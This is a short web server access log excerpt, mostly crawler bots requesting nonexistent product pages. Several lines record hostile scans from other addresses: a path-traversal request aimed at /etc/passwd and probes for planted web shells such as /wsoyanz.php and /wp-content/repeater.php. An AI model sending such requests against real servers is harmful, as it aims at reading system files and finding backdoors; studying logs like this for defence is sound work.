216.73.216.159 - - [18/Oct/2025:15:59:29 -0400] "GET /products235678788?kg=0232804739 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:15:59:33 -0400] "GET /__weave/file/tmp/weave/fs/../../../etc/passwd HTTP/1.1" 404 12365 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
202.56.2.88 - - [18/Oct/2025:15:59:42 -0400] "GET /wp-content/repeater.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:15:59:47 -0400] "GET /products80912798?kg=0079926138 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:15:59:53 -0400] "GET /products7230386?kg=0007142292 HTTP/1.1" 404 9743 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
202.56.2.88 - - [18/Oct/2025:15:59:55 -0400] "GET /wsoyanz.php HTTP/1.1" 404 10902 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:16:00:17 -0400] "GET /products173233000?kg=0171120485 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:00:23 -0400] "GET /products199365648?kg=0196934441 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:16:00:26 -0400] "GET /products60880440?kg=0060138077 HTTP/1.1" 404 9739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.159 - - [18/Oct/2025:16:00:29 -0400] "GET /products9047834?kg=0008937576 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:16:00:35 -0400] "GET /products15715264?kg=0015523697 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
